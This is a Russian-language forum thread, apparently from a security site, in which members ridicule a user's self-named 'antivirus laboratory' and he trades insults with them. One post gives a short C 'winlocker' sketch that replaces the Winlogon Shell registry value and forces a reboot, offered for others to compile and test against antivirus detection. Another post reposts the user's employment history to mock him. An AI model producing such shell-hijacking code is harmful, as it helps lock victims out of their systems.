Перейти к содержанию
Сергей Ильин

Антивирусная лаборатория Сергея Шибаева

Recommended Posts

Сергей Ильин
Вот только для чего тогда ваш virusinfo.info ссылается на такого фейкового горе-аналитика? Ай-яй-яй!

Где ссылается, покажите ссылки?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Mr.Belyash

SergeShibaev

Фейковая Антивирусная Лаборатория. Второе Издание

Смените надпись на сайте ...Это так креативно.

Руки так и чешутся украсть. :)

Ей бо

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
SergeShibaev

Трынь-трава, трах-тибидох! У вас тут, оказывается экспертный учёный совет по наименованию сайтов и выдаче сталинских премий? Я даже и не знал, что мне надо консультироваться с вашим высочеством насчёт своей фамилии. Прошу прощения, что мои родители с вами не посоветовались, когда забирали меня из роддома. Я что, просил оценивать свой вклад в мировую науку? А уж тем более перед такими "икспертами". Вы не нашли моих исследований? Или не искали? Я, вот лично, не нашёл ваших. Но это почему-то не мешает вам называться anti-malware! Хотя ни одной статьи про malware я на вашем портале (фиговое слово, но в данном контексте прозвучит, как оскорбление) не обнаружил. Где оно??? Ваш личный вклад, как маркетолога, мне понятен. Флаг в руки! Доехать успешно, без прерываний и креш-дампов! Что вы производите кроме воздуха? Рейтинговое агенство Муди? Ой, раскладку не переключил, Moody's, конечно! Вот сегодня ознакомился с творчеством мистера Беляша. Про него так же ничего не слышал ещё неделю назад, как и про Илью Шабанова. Вот его фамилию теперь могу честно писать с большой буквы, вижу результат. А на продажных менеджеров... ой, опять не то, .... на менеджеров по продажам буду обращать внимание только, когда займусь бизнесом, а это будет не скоро.

Где ссылается, покажите ссылки?

Воспользуйтесь поиском по форуму. Этим вы сможете перейти на более высокий образовательный уровень в области IT. Кхм, по-моему, я кого-то цитирую...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин
А на продажных менеджеров... ой, опять не то, .... на менеджеров по продажам буду обращать внимание только, когда займусь бизнесом, а это будет не скоро.

Так а чего вы сюда пришли то вообще, раз тут все такие недостойные, ну кроме Беляша, разумеется? Вас разве кто-то звал?

Вы не сможете заниматься бизнесом, не тешите себя иллюзиями. В лучшем случае будет еще один "Бабушкин и Ко" ну или второй вариант - "непонятый гений, самоучка" :)

Воспользуйтесь поиском по форуму. Этим вы сможете перейти на более высокий образовательный уровень в области IT. Кхм, по-моему, я кого-то цитирую...

Вы сами это предложили :)

http://virusinfo.info/showthread.php?t=111885 - наш хелпер один раз в 2011 году дал ссылку на ваш сайт. Редкая удача, тут трафик и попер! :)

Ох лол, вы бы не позорились так ...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Mr.Belyash

Плеваю на головы неверных с вершины Арарат. B)

P.S.

Стесняюсь спросить "мну" вы специально "напомнили"?

Это как бы наезд?

P.P.S.

Вы ведь эксперт?

Сертифицированый?

И работы у вас есть?

Или как я? на коленке...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
SergeShibaev
Так а чего вы сюда пришли то вообще, раз тут все такие недостойные, ну кроме Беляша, разумеется? Вас разве кто-то звал?

Зачем пришёл? Так ты ж меня позвал сюда, разве нет? Ну или кто-то, кто умеет оставлять следы на реферерах.

Вы не сможете заниматься бизнесом, не тешите себя иллюзиями. В лучшем случае будет еще один "Бабушкин и Ко" ну или второй вариант - "непонятый гений, самоучка" :)

Опять субъективное мнение хренового маркетолога. Есть прувы? Или так просто, вышел пиписькой помахать?

Я бы лично постеснялся писать, что после ФизТеха работаю менеджером по продажам. Карма -100.

Вы сами это предложили :)

http://virusinfo.info/showthread.php?t=111885 - наш хелпер один раз в 2011 году дал ссылку на ваш сайт. Редкая удача, тут трафик и попер! :)

Ох лол, вы бы не позорились так ...

В чём заключается позор? Будут пояснения? Или опять лозунги?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
SergeShibaev
Что вообще занимаются лаборатории в широком смысле знаете?

Русский язык знаю. Почти в совершенстве. А вот с такими экспертами сталкиваюсь впервые.

Ой, почитал, что значит MVP от Microsoft.... Прошу прощения, что назвал вас экспертом.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

Mr.Belyash, это не мы к нему прицепились, это он пришел на форум и стал грубить. Мы в адрес его названия просто позубоскалить хотели.

Может хватит переходить на личности и пытаться доказать Сергею, что он урод?

PS: а как же вы про Беляша не слышали? думаю, что каждый уважающий себя вирлаб про него знает. Ведь он винлоки шлет не только в др.веб...хотя кепко-футболки другие вирлабы ему не спешат чего-то дарить....

PS2: если бы вы как-нибудь попытались произвести интвентаризацию винлоков в своей коллекции (если бы она была) и разделить их, допустим, на 50 семейств, то во время выполнения данной задачи вывалились с поиска бы на стоп-винлок.

PS3: мне даже удавалось туда вываливаться во время обновления движка и был виден баннер от нуллед.вс - двиг DLE у Макса нуленый :)

PS4: удавалось видеть даже ботнеты с заданием ддоса его сайта :)

PS5: а еще школяры через яндекс приходят на его сайт чтобы скачать винлокбилдер ))

Как же вы так сознались, что Беляша не знаете ((

Хотя я с ним тоже особо не знаком, ни разу не общались. Mr.Belyash, почему? :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

SergeShibaev все ясно, пошли детские заявления в стиле сам дурак. Ссылки на исследования будут, спрашиваю еще раз? Чем лаборатория то занимается в лице одного человека?

Зачем пришёл? Так ты ж меня позвал сюда, разве нет? Ну или кто-то, кто умеет оставлять следы на реферерах.

Я вас сюда не звал, это точно :) И на ты не разрешал себя называть.

Стесняюсь спросить "мну" вы специально "напомнили"?

Это как бы наезд?

Специально, товарищ же говорил лестные слова выше :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин
Serge Shibaev

программист

Arkada, LLC

сентябрь 2011 г. – настоящее время (1 год 11 месяцев) Москва, Россия

Разработка утилит для работы с 3D моделями объектов под Windows / Linux, сайтов на основе технологии WebGL.

программист

Polak IT

июль 2010 г. – июль 2011 г. (1 год 1 месяц)

Разработка ERP системы автотранспортного предприятия (ИС "Автопарк")

программист

ОАО "Корпорация 'Фазотрон-НИИР'"

февраль 2000 г. – август 2006 г. (6 лет 7 месяцев)

программирование сигнальных процессоров Analog Devices, разработка многопроцессорных систем обработки радиолокационных сигналов

Антивирусная Лаборатория в профессиональных руках :) И этот человек еще что-то говорит про продавцов ...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Mr.Belyash
Mr.Belyash, это не мы к нему прицепились, это он пришел на форум и стал грубить. Мы в адрес его названия просто позубоскалить хотели.

Может хватит переходить на личности и пытаться доказать Сергею, что он урод?

PS: а как же вы про Беляша не слышали? думаю, что каждый уважающий себя вирлаб про него знает. Ведь он винлоки шлет не только в др.веб...хотя кепко-футболки другие вирлабы ему не спешат чего-то дарить....

PS2: если бы вы как-нибудь попытались произвести интвентаризацию винлоков в своей коллекции (если бы она была) и разделить их, допустим, на 50 семейств, то во время выполнения данной задачи вывалились с поиска бы на стоп-винлок.

PS3: мне даже удавалось туда вываливаться во время обновления движка и был виден баннер от нуллед.вс - двиг DLE у Макса нуленый :)

PS4: удавалось видеть даже ботнеты с заданием ддоса его сайта :)

PS5: а еще школяры через яндекс приходят на его сайт чтобы скачать винлокбилдер ))

Как же вы так сознались, что Беляша не знаете ((

Хотя я с ним тоже особо не знаком, ни разу не общались. Mr.Belyash, почему? :)

Я афигел. Откуда дровишки? :lol:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Mr.Belyash
двиг DLE у Макса нуленый

Денег нет.

Распространение принесло бы много бабок, а вот с другой стороны(фронта) экономически не выгодно.

Никто не желает финансировать помощь пострадавшим :)

Увы и ах.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
SergeShibaev

Абалдеть три раза! Сергей Ильин, вам не спится? До часу ночи искал мой профиль на Linkedin? Что ж сразу не попросил, я бы дал ссылку. Или тоже сайт ненадёжный, мало ли чего, да? А подчеркнул слова, значение которых неизвестно? Что из вышеперечисленного мешает удалять вирусы в нерабочее время? Пожалуй, стоит устроиться в Смоленскэнерго. Против них вы ведь не возражаете? Наверное, все маркетологи из лаборатории Касперского умеют вслепую дампить PE-файлы, а ведущие так вообще, силой мысли и убеждения изгоняют бесов из ядра за пределы третьего транспортного кольца и форматируют БИОС взглядом. Где ссылки на ваши исследования по компьютерной безопасности, я ещё раз спрашиваю? Вы же позиционируете себя как "Сфера компетенции и экспертных знаний включает широкий спектр задач от аналитики и стратегического маркетинга до информационной безопасности и антивирусных исследований". Вашу аналитику видел. Не читал, не интересно, но видел. А где же "ДО"? Где ваши статьи по информационной безопасности и антивирусные исследования? Вот это, http://www.youtube.com/user/OldRampant, я понимаю, исследования. Мои вы искать не желаете или не умеете. Хотя я нигде ни разу не говорил, что я исследователь и занимаюсь научной работой. Однако ж даже ваш хелпер случайно дал ссылку на моё исследование, которым занимаюсь и по сей день. Надеюсь, он за это будет серьёзно наказан? Останется без сладкого на ужин? Дадут полусладкое. Про свою диссертацию рассказывать не буду, она не про маркетинг и красивых картинок там немного. Хотя кое-что из неё можете найти на сайте "Фейковой Антивирусной Лаборатории Сергея Шибаева". Это не реклама, я же не даю ссылку на сайт с ненадёжной репутацией. Тем более, вы там обнаружили копипаст с других сайтов! Пойду поставлю себя в угол, если обнаружу (случайно, конечно!) какую из опубликованных у меня статей я скопипиздил.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
SergeShibaev
Mr.Belyash, это не мы к нему прицепились, это он пришел на форум и стал грубить. Мы в адрес его названия просто позубоскалить хотели.

Может хватит переходить на личности и пытаться доказать Сергею, что он урод?

PS: а как же вы про Беляша не слышали? думаю, что каждый уважающий себя вирлаб про него знает. Ведь он винлоки шлет не только в др.веб...хотя кепко-футболки другие вирлабы ему не спешат чего-то дарить....

PS2: если бы вы как-нибудь попытались произвести интвентаризацию винлоков в своей коллекции (если бы она была) и разделить их, допустим, на 50 семейств, то во время выполнения данной задачи вывалились с поиска бы на стоп-винлок.

PS3: мне даже удавалось туда вываливаться во время обновления движка и был виден баннер от нуллед.вс - двиг DLE у Макса нуленый :)

PS4: удавалось видеть даже ботнеты с заданием ддоса его сайта :)

PS5: а еще школяры через яндекс приходят на его сайт чтобы скачать винлокбилдер ))

Как же вы так сознались, что Беляша не знаете ((

Хотя я с ним тоже особо не знаком, ни разу не общались. Mr.Belyash, почему? :)

Ах вот оно, оказывается, как было на самом деле! Это я пришёл на форум и стал грубить? А потом был выставлен на всеобщее обозрение и всемирное порицание? Или же всё же наоборот? Мне кажется, это у вас указатель на вершину стека покосился слегка. "Дети! Я сегодня привела к нам в класс нового мальчика. Знакомьтесь, дети, это Серёжа! Дети! Поскольку вы меня хорошо знаете и уважаете, а кто-то может быть даже любит ... Сидоров! Быстро вытащи руку из штанов! .... давайте все дружно объясним Сережё, что он урод!" priv8v, я от ваших ПС-ПС-ПС уже третий раз в туалет бегаю! А вот про Беляша не слышал, не приходилось как-то пересекаться. Ни разу не искал коды разблокировки винлоков, у меня LiveCD есть с редактором реестра. А инвентаризацию винлоков для чего надо производить? Мне это чем-то поможет в жизни? Или все так делают кроме меня, и мне надо срочно навёрстывать упущенное? А винлокбилдер для чего надо качать? Его ж можно на коленке за полчаса настругать. Примерно так:

#include <Windows.h>#pragma comment(linker, "/ENTRY:_tWinMain")BOOL Shutdown(){    HANDLE hToken;    TOKEN_PRIVILEGES tkp;    if (!OpenProcessToken(GetCurrentProcess(),                           TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,                           &hToken))        return FALSE;    LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid);    tkp.PrivilegeCount = 1;    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;    AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0);    if (GetLastError() != ERROR_SUCCESS)        return FALSE;    return ExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_APPLICATION);}int APIENTRY _tWinMain(HINSTANCE hInstance,                        HINSTANCE hPrevInstance,                       LPTSTR    lpCmdLine,                       int       nCmdShow){        HKEY Key;    WCHAR winlock[] = L"notepad.exe";    RegOpenKeyEx(HKEY_LOCAL_MACHINE,                  L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon",                  0, KEY_READ, &Key);    RegSetValueEx(Key, L"Shell", 0, REG_SZ, (LPBYTE)winlock, wcsnlen_s(winlock, MAX_PATH)+1);    if (!Shutdown())        MessageBox(NULL, L"Вирус просит вас самостоятельно перезагрузить Windows", L"Внимание!", MB_ICONWARNING);        return 0;}

Работоспособность не проверял, писал на бумажке. Желаюшие могут собрать и спросить у Касперского, почему он такое пропускает.

Отредактировал SergeShibaev
  • Downvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин
Где ваши статьи по информационной безопасности и антивирусные исследования? Вот это, http://www.youtube.com/user/OldRampant, я понимаю, исследования. Мои вы искать не желаете или не умеете. Хотя я нигде ни разу не говорил, что я исследователь и занимаюсь научной работой. Однако ж даже ваш хелпер случайно дал ссылку на моё исследование, которым занимаюсь и по сей день. Надеюсь, он за это будет серьёзно наказан? Останется без сладкого на ужин? Дадут полусладкое. Про свою диссертацию рассказывать не буду, она не про маркетинг и красивых картинок там немного. Хотя кое-что из неё можете найти на сайте "Фейковой Антивирусной Лаборатории Сергея Шибаева". Это не реклама, я же не даю ссылку на сайт с ненадёжной репутацией. Тем более, вы там обнаружили копипаст с других сайтов! Пойду поставлю себя в угол, если обнаружу (случайно, конечно!) какую из опубликованных у меня статей я скопипиздил.

Разве это я назвал свой сайт "Антивирусная Лаборатория"? Мой сайт называется "Информационно-аналитический центр", я этим не обманываю людей. Вы что-то заигрались в оратора :)

Итого понятен: исследований нет, за пафосом вирлаба только копипаст и пуки в лужу, как собственно и в этой теме. С нетерпением жду появления "Антивируса Шибаева", может даже в мемы лурка или двача с ним попадете. А это уже известность! Трафик пойдет такой ...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
alexgr

Вашу аналитику видел.

она есть а прессе и неоднократно представлялась на конференциях, в том числе - международных. Как то так.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Mr.Belyash

Если честно, то не понял. Это стёб был? Или как?

Прокомментирую на всякий случай.

PS1: а как же вы про Беляша не слышали? думаю, что каждый уважающий себя вирлаб про него знает. Ведь он винлоки шлет не только в др.веб...хотя кепко-футболки другие вирлабы ему не спешат чего-то дарить....

Не позиционирую…тихой сапою…

За футболко/кепку порву любого.

А вообще да, оправляю в вирлабы, кроме ЛК (отношение к человекам увы).

Не заливаю на вирустотал. Потому как ЛК получит от-туда халяву. Тупо md5 на сайте.

----

PS2: как карма ляжет

----

PS3: ответил выше

----

PS4:Здесь малопонятно. Ирония?

Атаки были, хостеры отказывались моментально.

---

PS5: Облако,теги…сео тлядь

:D

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
SergeShibaev
Разве это я назвал свой сайт "Антивирусная Лаборатория"? Мой сайт называется "Информационно-аналитический центр", я этим не обманываю людей. Вы что-то заигрались в оратора :)

Ваш сайт называется anti-malware. Ткните носом, где тут у вас malware? Вижу только проплаченные исследования и тесты и кнопочку "Прислать статью". Писать самостоятельно получается плохо или не о чем?

Итого понятен: исследований нет, за пафосом вирлаба только копипаст и пуки в лужу, как собственно и в этой теме.

Кому понятен? Что вы прикопались к моим исследованиям? Не получилось их найти за ту минуту, проведённую на сайте? Зато за это же время был резво и безоговорочно обнаружен копипаст.

С нетерпением жду появления "Антивируса Шибаева", может даже в мемы лурка или двача с ним попадете. А это уже известность! Трафик пойдет такой ...

Придётся ждать очень долго, в ближайшее время таких грандиозных планов не имеется. Но за ожидания и веру спасибо огромное! Добавлю эту цитату к себе в пресс-релиз.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
SergeShibaev
Вашу аналитику видел.

она есть а прессе и неоднократно представлялась на конференциях, в том числе - международных. Как то так.

Я же и говорю, аналитику видел. Теперь хочется посмотреть на техническую составляющую статей по информационной безопасности, а не на маркетинговую.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Васька

Да ладно вам, горячие финские парни :D

Хотели просто поржать...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v
priv8v, я от ваших ПС-ПС-ПС уже третий раз в туалет бегаю! А вот про Беляша не слышал, не приходилось как-то пересекаться. Ни разу не искал коды разблокировки винлоков, у меня LiveCD есть с редактором реестра. А инвентаризацию винлоков для чего надо производить? Мне это чем-то поможет в жизни? Или все так делают кроме меня, и мне надо срочно навёрстывать упущенное? А винлокбилдер для чего надо качать?

У вас ведь не платный туалет? :) Да я как-то на его сайт приходил тоже не в поиске кодов разблокировки: у него удобно то, что есть мд5 и скрин. Касательно винлоков - их удобнее всего раскладывать по семействам именно по их внешнему виду, заодно можно прослеживать эволюцию версий. Видеть общее, видеть основные тенденции и т.д... вы ведь называете себя вирусной лабораторией т.е техническим специалистом по зловредам... и пытаетесь назвать Ильина гнусным маркетологом... дык какой-то хреновый вы технарь, пару зловредов ковырнули и еще спрашиваете зачем проводить инвентаризацию... чем же тогда ваш вирлаб занимается? знакомым компы пролечиваете?

Винлокбилдер для чего качать? Да хотя бы чтобы с помощью ксн прикинуть географическое распространение данного семейства и закодить более точную тулзу детекта данного семейства...

Все, что мы пытаемся сказать - название вирлаб это серьезная замашка. Даже Зайцев себя так никогда не именовал... (или вы о нем тоже не слышали? :lol: )

А на какой песочнице базируется ваша система автоанализа сэмплов и как вы решили проблему anti-vm ?))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
VIKING

Ну вот негаданно и главное бесплатно получилась прекрасная реклама данной "антивирусной лаборатории"..... :facepalm:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
SDA
Ну вот негаданно и главное бесплатно получилась прекрасная реклама данной "антивирусной лаборатории"..... :facepalm:

таджикские хакеры уже зантересовались :lol:

Здравствуйте, вы получили вирус по емейлу. Поскольку сами мы такой код писать еще не умеем — пожалуйста, перефорвардите этот емейл по всем адресам в вашей адресной книге, после чего отформатируйте ваш хард-драйв. С уважением, группа таджикских хакеров.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
VIKING
таджикские хакеры уже зантересовались :lol:

Улыбнуло...... :rolleyes:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
SergeShibaev

sda, это боян 10-летней давности. Даже стыдно публиковать такое в моей теме

У вас ведь не платный туалет? :) Да я как-то на его сайт приходил тоже не в поиске кодов разблокировки: у него удобно то, что есть мд5 и скрин. Касательно винлоков - их удобнее всего раскладывать по семействам именно по их внешнему виду, заодно можно прослеживать эволюцию версий. Видеть общее, видеть основные тенденции и т.д... вы ведь называете себя вирусной лабораторией т.е техническим специалистом по зловредам... и пытаетесь назвать Ильина гнусным маркетологом... дык какой-то хреновый вы технарь, пару зловредов ковырнули и еще спрашиваете зачем проводить инвентаризацию... чем же тогда ваш вирлаб занимается? знакомым компы пролечиваете?

Винлокбилдер для чего качать? Да хотя бы чтобы с помощью ксн прикинуть географическое распространение данного семейства и закодить более точную тулзу детекта данного семейства...

Все, что мы пытаемся сказать - название вирлаб это серьезная замашка. Даже Зайцев себя так никогда не именовал... (или вы о нем тоже не слышали? :lol: )

А на какой песочнице базируется ваша система автоанализа сэмплов и как вы решили проблему anti-vm ?))

К сожалению, эта тема создана для того, чтобы позубоскалить и поржать над фейковой антивирусной лабораторией одного урода, имеет нулевую ценность и репутацию. Поэтому обсудить с вами технические детали я никак здесь не могу, дабы модераторы не сочли оффтопиком и не расстреляли из плюсомёта. Создайте новую тему с подобными вопросами.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Гость
Эта тема закрыта для публикации ответов.

  • Сообщения

    • Ego Dekker
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • PR55.RP55
      .xml  файлы taskschd.msc Могут быть подписаны  цифровой подписью. Думаю будет нелишним, если uVS будет это фиксировать. т.е. проверять не только подпись целевого файла, но и подпись самого файла\задачи. и писать в ИНфО .  
    • demkd
      ---------------------------------------------------------
       4.15.2
      ---------------------------------------------------------
       o Исправлена ошибка при работе с образом автозапуска.
         Для некоторых процессов команда unload не добавлялась в скрипт при нажатии кнопки "принять изменения".  o Добавлена плашка окна на таскбаре для окна удаленного рабочего стола.
         (при работе с удаленной системой) -----------------------------------------------------------
      Есть проблема с локализацией глюка в редких случаях приводящему к аварийному завершению uVS при активном флаге "Проверять весь HKCR".
      На основе дампов его найти не получается, нужна копия реестра системы с такой проблемой, если кому-то попадется такая проблема, то присылайте архив с копией реестра системы мне на почту.  
×